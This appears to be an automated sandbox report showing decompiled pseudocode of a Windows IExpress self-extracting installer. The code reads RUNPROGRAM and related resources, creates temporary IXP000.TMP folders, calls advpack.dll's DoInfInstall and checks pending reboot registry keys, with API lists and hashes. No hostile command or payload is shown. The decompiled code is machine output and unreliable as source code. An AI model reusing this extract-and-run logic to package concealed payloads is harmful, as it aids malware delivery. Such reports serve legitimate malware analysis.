                  												_t80 = E00F33E45(_t129,  &_v352); // executed
                  												__eflags = _t80;
                  												if(_t80 == 0) {
                  													L63:
                  													LocalFree(_t150);
                  													goto L64;
                  												}
                  												L60:
                  												LocalFree(_t150);
                  												_t126 = _t126 + 1;
                  												_v392 = _t126;
                  												__eflags = _t126 - 2;
                  												if(_t126 >= 2) {
                  													_t154 = 1;
                  													__eflags = 1;
                  													L71:
                  													__eflags =  *0xf3856c;
                  													if( *0xf3856c != 0) {
                  														E00F320AF();
                  													}
                  													_t78 = _t154;
                  													goto L65;
                  												}
                  												_t152 = _v396;
                  												_t148 = _v388;
                  												continue;
                  											}
                  											L40:
                  											__eflags =  *0xf381c4;
                  											if( *0xf381c4 == 0) {
                  												_t145 = 0x4c7;
                  												E00F34327(0, 0x4c7, 0, 0, 0x10, 0);
                  												LocalFree(_v424);
                  												 *0xf39a88 = 0x8007042b;
                  												goto L64;
                  											}
                  											__eflags = _t156;
                  											if(_t156 == 0) {
                  												goto L59;
                  											}
                  											__eflags =  *0xf39a74 & 0x00000004;
                  											if(__eflags == 0) {
                  												goto L59;
                  											}
                  											_t128 = E00F3635A(_t126, _t131, _t156, __eflags);
                  											__eflags = _t128;
                  											if(_t128 == 0) {
                  												_t145 = 0x4c8;
                  												E00F34327(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                  												L67:
                  												LocalFree(_v408);
                  												 *0xf39a88 = E00F3613C();
                  												goto L64;
                  											}
                  											_t145 = GetProcAddress(_t128, "DoInfInstall");
                  											_v404 = _t145;
                  											__eflags = _t145;
                  											if(_t145 == 0) {
                  												_t145 = 0x4c9;
                  												__eflags = 0;
                  												E00F34327(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                  												FreeLibrary(_t128);
                  												goto L67;
                  											}
                  											_v384 = _v384 & 0x00000000;
                  											__eflags =  *0xf38950;
                  											_t150 = _v408;
                  											_v368 =  &_v280;
                  											_t95 =  *0xf39a80; // 0x3
                  											_v364 = _t95;
                  											_t96 =  *0xf38958 & 0x0000ffff;
                  											_v380 = 0xf39194;
                  											_v376 = _t150;
                  											_v372 = 0xf39224;
                  											_v360 = _t96;
                  											if( *0xf38950 != 0) {
                  												_t96 = _t96 | 0x00010000;
                  												__eflags = _t96;
                  												_v360 = _t96;
                  											}
                  											_t143 =  *0xf39a74; // 0x1
                  											__eflags = _t143 & 0x00000008;
                  											if((_t143 & 0x00000008) != 0) {
                  												_t96 = _t96 | 0x00020000;
                  												__eflags = _t96;
                  												_v360 = _t96;
                  											}
                  											__eflags = _t143 & 0x00000010;
                  											if((_t143 & 0x00000010) != 0) {
                  												_t96 = _t96 | 0x00040000;
                  												__eflags = _t96;
                  												_v360 = _t96;
                  											}
                  											_t144 =  *0xf38c68; // 0x0
                  											__eflags = _t144 & 0x00000040;
                  											if((_t144 & 0x00000040) != 0) {
                  												_t96 = _t96 | 0x00080000;
                  												__eflags = _t96;
                  												_v360 = _t96;
                  											}
                  											__eflags = _t144;
                  											if(_t144 < 0) {
                  												_t103 = _t96 | 0x00100000;
                  												__eflags = _t103;
                  												_v360 = _t103;
                  											}
                  											_t97 =  *0xf39a78; // 0x0
                  											_v356 = _t97;
                  											_t129 = _t145;
                  											 *0xf3a290( &_v384);
                  											_t100 = _v404();
                  											__eflags = _t163 - _t163;
                  											if(_t163 != _t163) {
                  												_t129 = 4;
                  												asm("int 0x29");
                  											}
                  											 *0xf39a88 = _t100;
                  											_push(_t128);
                  											__eflags = _t100;
                  											if(_t100 < 0) {
                  												FreeLibrary();
                  												goto L63;
                  											} else {
                  												FreeLibrary();
                  												_t126 = _v396;
                  												goto L60;
                  											}
                  										}
                  										__eflags =  *0xf39a80 - 1; // 0x3
                  										if(__eflags == 0) {
                  											goto L39;
                  										}
                  										__eflags =  *0xf38940;
                  										if( *0xf38940 == 0) {
                  											goto L39;
                  										}
                  										__eflags = _t156;
                  										if(_t156 != 0) {
                  											goto L40;
                  										}
                  										_v388 = 1;
                  										E00F31E6B(_t145); // executed
                  										goto L39;
                  									}
                  									_t145 =  &_v280;
                  									_t107 = E00F34538("POSTRUNPROGRAM",  &_v280, 0x104);
                  									__eflags = _t107;
                  									if(_t107 == 0) {
                  										goto L27;
                  									}
                  									__eflags =  *0xf38b62;
                  									if( *0xf38b62 != 0) {
                  										goto L71;
                  									}
                  									_t111 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                  									__eflags = _t111 == 0;
                  									if(_t111 == 0) {
                  										goto L71;
                  									}
                  									goto L33;
                  								}
                  								_t117 =  *0xf38958; // 0x0
                  								__eflags = _t117;
                  								if(_t117 == 0) {
                  									L25:
                  									__eflags = _t152;
                  									if(_t152 != 0) {
                  										goto L33;
                  									}
                  									_t145 =  &_v276;
                  									_t118 = E00F34538("RUNPROGRAM",  &_v276, 0x104);
                  									__eflags = _t118;
                  									if(_t118 != 0) {
                  										goto L29;
                  									}
                  									goto L27;
                  								}
                  								__eflags = _t117 & 0x00000001;
                  								if((_t117 & 0x00000001) == 0) {
                  									__eflags = _t117 & 0x00000002;
                  									if((_t117 & 0x00000002) == 0) {
                  										goto L64;
                  									}
                  									_t139 = "USRQCMD";
                  									L22:
                  									_t145 =  &_v276;
                  									_t119 = E00F34538(_t139,  &_v276, 0x104);
                  									__eflags = _t119;
                  									if(_t119 == 0) {
                  										goto L27;
                  									}
                  									_t121 = CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff);
                  									__eflags = _t121 - 2 - 0xfffffffe;
                  									if(_t121 - 2 != 0xfffffffe) {
                  										_t152 = 1;
                  										__eflags = 1;
                  										_v392 = 1;
                  									}
                  									goto L25;
                  								}
                  								_t139 = "ADMQCMD";
                  								goto L22;
                  							}
                  							_push(6);
                  							_v304 = 1;
                  							_pop(0);
                  							L13:
                  							_v300 = 0;
                  							goto L16;
                  						}
                  						_v304 = 1;
                  						goto L13;
                  						L28:
                  						_push(_t129);
                  						_t145 = 0x104;
                  						E00F3158C( &_v276, 0x104, _t129, 0xf38b62);
                  						goto L29;
                  					}
                  				}
                  				_t129 = "REBOOT";
                  				_t124 = E00F34538(_t129, 0xf39a6c, 4);
                  				if(_t124 == 0 || _t124 > 4) {
                  					_push(_t126);
                  					_push(0x10);
                  					_push(_t126);
                  					_push(_t126);
                  					goto L4;
                  				} else {
                  					goto L5;
                  				}
                  			}
































































                  0x00f33cea
                  0x00f33cea
                  0x00f33cee
                  0x00f33cf1
                  0x00f33cf3
                  0x00f33cf3
                  0x00f33cf8
                  0x00f33cf8
                  0x00f33cfc
                  0x00f33d02
                  0x00f33d05
                  0x00f33d07
                  0x00f33d07
                  0x00f33d0c
                  0x00f33d0c
                  0x00f33d10
                  0x00f33d12
                  0x00f33d14
                  0x00f33d14
                  0x00f33d19
                  0x00f33d19
                  0x00f33d1d
                  0x00f33d24
                  0x00f33d28
                  0x00f33d2f
                  0x00f33d35
                  0x00f33d39
                  0x00f33d3b
                  0x00f33d3d
                  0x00f33d42
                  0x00f33d42
                  0x00f33d44
                  0x00f33d49
                  0x00f33d4a
                  0x00f33d4c
                  0x00f33d8f
                  0x00000000
                  0x00f33d4e
                  0x00f33d4e
                  0x00f33d54
                  0x00000000
                  0x00f33d54
                  0x00f33d4c
                  0x00f33c17
                  0x00f33c1e
                  0x00000000
                  0x00000000
                  0x00f33c20
                  0x00f33c27
                  0x00000000
                  0x00000000
                  0x00f33c29
                  0x00f33c2b
                  0x00000000
                  0x00000000
                  0x00f33c2d
                  0x00f33c31
                  0x00000000
                  0x00f33c31
                  0x00f33baa
                  0x00f33bb6
                  0x00f33bbb
                  0x00f33bbd
                  0x00000000
                  0x00000000
                  0x00f33bbf
                  0x00f33bc6
                  0x00000000
                  0x00000000
                  0x00f33be0
                  0x00f33be7
                  0x00f33be8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00f33be8
                  0x00f33af6
                  0x00f33afc
                  0x00f33aff
                  0x00f33b58
                  0x00f33b58
                  0x00f33b5a
                  0x00000000
                  0x00000000
                  0x00f33b65
                  0x00f33b71
                  0x00f33b76
                  0x00f33b78
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00f33b78
                  0x00f33b01
                  0x00f33b03
                  0x00f33b0c
                  0x00f33b0e
                  0x00000000
                  0x00000000
                  0x00f33b14
                  0x00f33b19
                  0x00f33b1e
                  0x00f33b25
                  0x00f33b2a
                  0x00f33b2c
                  0x00000000
                  0x00000000
                  0x00f33b43
                  0x00f33b4c
                  0x00f33b4f
                  0x00f33b53
                  0x00f33b53
                  0x00f33b54
                  0x00f33b54
                  0x00000000
                  0x00f33b4f
                  0x00f33b05
                  0x00000000
                  0x00f33b05
                  0x00f33ace
                  0x00f33ad0
                  0x00f33ad4
                  0x00f33ad5
                  0x00f33ad5
                  0x00000000
                  0x00f33ad5
                  0x00f33abf
                  0x00000000
                  0x00f33b86
                  0x00f33b86
                  0x00f33b8d
                  0x00f33b99
                  0x00000000
                  0x00f33b99
                  0x00f33a6a
                  0x00f33a33
                  0x00f33a38
                  0x00f33a3f
                  0x00f33a46
                  0x00f33a47
                  0x00f33a49
                  0x00f33a4a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 00F33A78
                  • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F33B43
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F38B62), ref: 00F33BE0
                  • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F33C76
                  • FreeLibrary.KERNEL32(00000000,?,00F38B62), ref: 00F33D4E
                  • LocalFree.KERNEL32(?,?,?,?,00F38B62), ref: 00F33D6E
                  • FreeLibrary.KERNEL32(00000000,?,00F38B62), ref: 00F33D8F
                  • LocalFree.KERNEL32(?,?,?,?,00F38B62), ref: 00F33D96
                  • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F38B62), ref: 00F33DC7
                  • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F38B62), ref: 00F33DD1
                  • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F38B62), ref: 00F33E13
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Free$Local$Library$CompareResourceString$AddressFindProcSizeofmemset
                  • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$Umorals4$advpack.dll
                  • API String ID: 2245518414-3849701229
                  • Opcode ID: 84c7164eca5eeda2131ed63d710a015731f11da0c0567d0e61022048879eac74
                  • Instruction ID: 45a84f1a2b7808ca4514953f96125bb9f7e27b3b44ed8b6d9e597e6c93995730
                  • Opcode Fuzzy Hash: 84c7164eca5eeda2131ed63d710a015731f11da0c0567d0e61022048879eac74
                  • Instruction Fuzzy Hash: FAB1F470A083459BD720DF248C45B6BB7E5EB84770F10092DF991D72A0DBB8DA44FB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00F35467() {
                  				signed int _v8;
                  				char _v265;
                  				char _v268;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t28;
                  				int _t32;
                  				int _t33;
                  				int _t35;
                  				signed int _t36;
                  				signed int _t38;
                  				int _t40;
                  				int _t44;
                  				long _t48;
                  				int _t49;
                  				int _t50;
                  				signed int _t53;
                  				int _t54;
                  				int _t59;
                  				char _t60;
                  				int _t65;
                  				char _t66;
                  				int _t67;
                  				int _t68;
                  				int _t69;
                  				int _t70;
                  				int _t71;
                  				struct _SECURITY_ATTRIBUTES* _t72;
                  				int _t73;
                  				CHAR* _t82;
                  				CHAR* _t88;
                  				void* _t103;
                  				signed int _t110;
                  
                  				_t28 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t28 ^ _t110;
                  				_t2 = E00F34538("RUNPROGRAM", 0, 0) + 1; // 0x1
                  				_t109 = LocalAlloc(0x40, _t2);
                  				if(_t109 != 0) {
                  					_t82 = "RUNPROGRAM";
                  					_t32 = E00F34538(_t82, _t109, 1);
                  					__eflags = _t32;
                  					if(_t32 != 0) {
                  						_t33 = lstrcmpA(_t109, "<None>");
                  						__eflags = _t33;
                  						if(_t33 == 0) {
                  							 *0xf39a70 = 1;
                  						}
                  						LocalFree(_t109);
                  						_t35 =  *0xf38a5e; // 0x0
                  						__eflags = _t35;
                  						if(_t35 == 0) {
                  							__eflags =  *0xf38944; // 0x0
                  							if(__eflags != 0) {
                  								L46:
                  								_t101 = 0x7d2;
                  								_t36 = E00F363E1(_t82, 0x7d2, 0, E00F330C0, 0, 0);
                  								asm("sbb eax, eax");
                  								_t38 =  ~( ~_t36);
                  							} else {
                  								__eflags =  *0xf39a70; // 0x0
                  								if(__eflags != 0) {
                  									goto L46;
                  								} else {
                  									_t109 = 0xf39224;
                  									_t40 = GetTempPathA(0x104, 0xf39224);
                  									__eflags = _t40;
                  									if(_t40 == 0) {
                  										L20:
                  										_push(_t82);
                  										E00F3158C( &_v268, 0x104, _t82, "A:\\");
                  										__eflags = _v268 - 0x5a;
                  										if(_v268 <= 0x5a) {
                  											do {
                  												_t109 = GetDriveTypeA( &_v268);
                  												__eflags = _t109 - 6;
                  												if(_t109 == 6) {
                  													L23:
                  													_t48 = GetFileAttributesA( &_v268);
                  													__eflags = _t48 - 0xffffffff;
                  													if(_t48 != 0xffffffff) {
                  														goto L31;
                  													} else {
                  														goto L24;
                  													}
                  												} else {
                  													__eflags = _t109 - 3;
                  													if(_t109 != 3) {
                  														L24:
                  														__eflags = _t109 - 2;
                  														if(_t109 != 2) {
                  															L29:
                  															_t66 = _v268;
                  															goto L30;
                  														} else {
                  															_t66 = _v268;
                  															__eflags = _t66 - 0x41;
                  															if(_t66 == 0x41) {
                  																L30:
                  																_t60 = _t66 + 1;
                  																_v268 = _t60;
                  																goto L43;
                  															} else {
                  																__eflags = _t66 - 0x42;
                  																if(_t66 == 0x42) {
                  																	goto L30;
                  																} else {
                  																	_t68 = E00F3685C( &_v268);
                  																	__eflags = _t68;
                  																	if(_t68 == 0) {
                  																		goto L29;
                  																	} else {
                  																		__eflags = _t68 - 0x19000;
                  																		if(_t68 >= 0x19000) {
                  																			L31:
                  																			_push(0);
                  																			_t103 = 3;
                  																			_t49 = E00F35849( &_v268, _t103, 1);
                  																			__eflags = _t49;
                  																			if(_t49 != 0) {
                  																				L34:
                  																				_t50 = E00F3248E(0,  &_v268, 1);
                  																				__eflags = _t50;
                  																				if(_t50 != 0) {
                  																					GetWindowsDirectoryA( &_v268, 0x104);
                  																				}
                  																				_t88 =  &_v268;
                  																				E00F364E7(_t88, 0x104, "msdownld.tmp");
                  																				_t53 = GetFileAttributesA( &_v268);
                  																				__eflags = _t53 - 0xffffffff;
                  																				if(_t53 != 0xffffffff) {
                  																					_t54 = _t53 & 0x00000010;
                  																					__eflags = _t54;
                  																				} else {
                  																					_t54 = CreateDirectoryA( &_v268, 0);
                  																				}
                  																				__eflags = _t54;
                  																				if(_t54 != 0) {
                  																					SetFileAttributesA( &_v268, 2);
                  																					_push(_t88);
                  																					_t109 = 0xf39224;
                  																					E00F3158C(0xf39224, 0x104, _t88,  &_v268);
                  																					_t101 = 1;
                  																					_t59 = E00F3532F(0xf39224, 1, 0);
                  																					__eflags = _t59;
                  																					if(_t59 != 0) {
                  																						goto L12;
                  																					} else {
                  																						_t60 = _v268;
                  																						goto L43;
                  																					}
                  																				} else {
                  																					_t60 = _v268 + 1;
                  																					_v265 = 0;
                  																					_v268 = _t60;
                  																					goto L43;
                  																				}
                  																			} else {
                  																				_t65 = E00F3248E(0,  &_v268, 1);
                  																				__eflags = _t65;
                  																				if(_t65 != 0) {
                  																					goto L29;
                  																				} else {
                  																					_t67 = E00F35849( &_v268, 1, 1, 0);
                  																					__eflags = _t67;
                  																					if(_t67 == 0) {
                  																						goto L29;
                  																					} else {
                  																						goto L34;
                  																					}
                  																				}
                  																			}
                  																		} else {
                  																			goto L29;
                  																		}
                  																	}
                  																}
                  															}
                  														}
                  													} else {
                  														goto L23;
                  													}
                  												}
                  												goto L47;
                  												L43:
                  												__eflags = _t60 - 0x5a;
                  											} while (_t60 <= 0x5a);
                  										}
                  										goto L44;
                  									} else {
                  										_t101 = 1;
                  										_t69 = E00F3532F(0xf39224, 1, 3); // executed
                  										__eflags = _t69;
                  										if(_t69 != 0) {
                  											goto L12;
                  										} else {
                  											_t82 = 0xf39224;
                  											_t70 = E00F3248E(0, 0xf39224, 1);
                  											__eflags = _t70;
                  											if(_t70 != 0) {
                  												goto L20;
                  											} else {
                  												_t101 = 1;
                  												_t82 = 0xf39224;
                  												_t71 = E00F3532F(0xf39224, 1, 1);
                  												__eflags = _t71;
                  												if(_t71 != 0) {
                  													goto L12;
                  												} else {
                  													do {
                  														goto L20;
                  														L44:
                  														GetWindowsDirectoryA( &_v268, 0x104);
                  														_push(4);
                  														_t101 = 3;
                  														_t82 =  &_v268;
                  														_t44 = E00F35849(_t82, _t101, 1);
                  														__eflags = _t44;
                  													} while (_t44 != 0);
                  													goto L2;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						} else {
                  							__eflags = _t35 - 0x5c;
                  							if(_t35 != 0x5c) {
                  								L10:
                  								_t72 = 1;
                  							} else {
                  								__eflags =  *0xf38a5f - _t35; // 0x0
                  								_t72 = 0;
                  								if(__eflags != 0) {
                  									goto L10;
                  								}
                  							}
                  							_t101 = 0;
                  							_t73 = E00F3532F(0xf38a5e, 0, _t72);
                  							__eflags = _t73;
                  							if(_t73 == 0) {
                  								_t101 = 0x4be;
                  								E00F34327(0, 0x4be, 0, 0, 0x10, 0);
                  								goto L2;
                  							} else {
                  								L12:
                  								_t38 = 1;
                  							}
                  						}
                  					} else {
                  						_t101 = 0x4b1;
                  						E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
                  						LocalFree(_t109);
                  						 *0xf39a88 = 0x80070714;
                  						goto L2;
                  					}
                  				} else {
                  					_t101 = 0x4b5;
                  					E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
                  					 *0xf39a88 = E00F3613C();
                  					L2:
                  					_t38 = 0;
                  				}
                  				L47:
                  				return E00F36C20(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                  			}

                  APIs
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000), ref: 00F35496
                  • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F354FF
                  • LocalFree.KERNEL32(00000000), ref: 00F35513
                    • Part of subcall function 00F34327: LocalAlloc.KERNEL32(00000040,?), ref: 00F3441B
                    • Part of subcall function 00F34327: MessageBeep.USER32(00000000), ref: 00F344D3
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F3450A
                    • Part of subcall function 00F34327: LocalFree.KERNEL32(00000000), ref: 00F34513
                  • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F354E7
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                    • Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C
                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F35583
                  • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F355E0
                  • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F355F9
                  • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F3568F
                  • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F356B1
                  • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F356C4
                  • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F356F2
                  • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F3573E
                    • Part of subcall function 00F3532F: GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35391
                    • Part of subcall function 00F3532F: CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F353FF
                    • Part of subcall function 00F3532F: RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35431
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DirectoryLocal$AttributesFileFreeMessage$AllocCreateResourceWindows$BeepDriveErrorFindInfoLastLoadPathRemoveSizeofStringSystemTempTypelstrcmp
                  • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                  • API String ID: 1841065146-3855382519
                  • Opcode ID: aabb1af3a4140e40f19b51c65e8e2877ff7b1ec2801834ad0e086e4d0775eb65
                  • Instruction ID: 89a7a5ff1c32e0e823516eb8e90673535a9ef7fe31743cd94247f6e523512e2e
                  • Opcode Fuzzy Hash: aabb1af3a4140e40f19b51c65e8e2877ff7b1ec2801834ad0e086e4d0775eb65
                  • Instruction Fuzzy Hash: 67813BB1E0461857DB649B319C46BFA726E9BD0B70F440065F8C6D3151EFB8DDC2BA11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00F35253(CHAR* __ecx, CHAR* __edx) {
                  				signed int _v8;
                  				char _v268;
                  				CHAR* _v272;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t8;
                  				long _t16;
                  				int _t17;
                  				void* _t23;
                  				CHAR* _t32;
                  				void* _t33;
                  				signed int _t35;
                  				void* _t36;
                  
                  				_t8 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t8 ^ _t35;
                  				_t23 = 0;
                  				_v272 = __ecx;
                  				_t32 = __edx;
                  				_t33 = 0;
                  				while(1) {
                  					E00F31524( &_v268, 0x104, "IXP%03d.TMP", _t23);
                  					_t36 = _t36 + 0x10;
                  					_t23 = _t23 + 1;
                  					E00F31485(_t32, 0x104, _v272);
                  					E00F364E7(_t32, 0x104,  &_v268); // executed
                  					RemoveDirectoryA(_t32); // executed
                  					_t16 = GetFileAttributesA(_t32); // executed
                  					if(_t16 == 0xffffffff) {
                  						break;
                  					}
                  					if(_t23 < 0x190) {
                  						continue;
                  					}
                  					L3:
                  					if(GetTempFileNameA(_v272, "IXP", 0, _t32) != 0) {
                  						_t33 = 1;
                  						DeleteFileA(_t32);
                  						CreateDirectoryA(_t32, 0);
                  					}
                  					L5:
                  					return E00F36C20(_t33, _t23, _v8 ^ _t35, 0x104, _t32, _t33);
                  				}
                  				_t17 = CreateDirectoryA(_t32, 0); // executed
                  				_t33 = 0;
                  				if(_t17 == 0) {
                  					goto L3;
                  				}
                  				_t33 = 1;
                  				 *0xf38940 = 1;
                  				goto L5;
                  			}

















                  APIs
                    • Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556
                  • RemoveDirectoryA.KERNELBASE(?,?,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352B8
                  • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352BF
                  • GetTempFileNameA.KERNEL32(?,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352E0
                  • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352EE
                  • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352F7
                  • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35315
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                  • API String ID: 1082909758-3862032828
                  • Opcode ID: 10b52002673bcde1f5aa14fa89c73e017481d934160adbc25c565a52c53f7417
                  • Instruction ID: ad8c93980ad367b908e704a88f9e34ac718eebf086f2d1cad99bb007a68b92ce
                  • Opcode Fuzzy Hash: 10b52002673bcde1f5aa14fa89c73e017481d934160adbc25c565a52c53f7417
                  • Instruction Fuzzy Hash: 9C110FB160021867D724DB759C89BBF7779EBC5B70F104154F585D2190CB748C45BA91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00F323CE(signed int __ecx) {
                  				int _v8;
                  				void* _v12;
                  				signed int _t13;
                  				signed int _t19;
                  				long _t25;
                  				void* _t27;
                  				int _t30;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t13 = __ecx & 0x0000ffff;
                  				_t30 = 0;
                  				if(_t13 == 0) {
                  					_t30 = E00F3233C(_t27);
                  				} else {
                  					if(_t13 == 1) {
                  						_v8 = 0;
                  						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                  							goto L6;
                  						} else {
                  							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                  							goto L5;
                  						}
                  						L11:
                  					} else {
                  						if(_t13 + 0xfffffffe <= 1) {
                  							_v8 = 0;
                  							_t25 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                  							if(_t25 == 0) {
                  								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                  								L5:
                  								asm("sbb eax, eax");
                  								_v8 = _v8 &  !( ~_t19);
                  								RegCloseKey(_v12); // executed
                  							}
                  							L6:
                  							_t30 = _v8;
                  						}
                  					}
                  				}
                  				return _t30;
                  				goto L11;
                  			}










                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00F33EEC,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?), ref: 00F3240B
                  • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?,00F33EEC), ref: 00F32424
                  • RegCloseKey.KERNELBASE(?,?,00F31D00,00000001,00000000,?,?,00F33F92,?,00F33EEC), ref: 00F32436
                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00F33EEC,00F33EEC,?,00F31D00,00000001,00000000,?,?,00F33F92,?), ref: 00F32458
                  • RegQueryInfoKeyA.ADVAPI32 ref: 00F32473
                  Strings
                  • System\CurrentControlSet\Control\Session Manager, xrefs: 00F32401
                  • PendingFileRenameOperations, xrefs: 00F3241C
                  • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F3244E
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
